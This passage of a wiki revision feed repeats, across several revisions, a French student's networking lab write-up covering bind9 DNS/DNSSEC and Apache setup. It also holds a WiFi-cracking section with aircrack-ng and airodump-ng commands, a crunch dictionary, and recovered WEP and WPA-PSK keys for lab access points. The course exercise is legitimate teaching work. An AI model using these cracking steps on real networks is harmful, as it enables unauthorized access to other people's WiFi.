mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12241</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12241"/>
		<updated>2026-02-10T22:54:48Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Déployer le DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
==== Configuration du paquetage bind9 ====&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
==== Déployer le DNS ====&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12240</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12240"/>
		<updated>2026-02-10T22:51:45Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Serveur Apache */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
==== Configuration du paquetage bind9 ====&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
==== Déployer le DNS ====&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
ns.tompere2.xyz&lt;br /&gt;
&lt;br /&gt;
IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
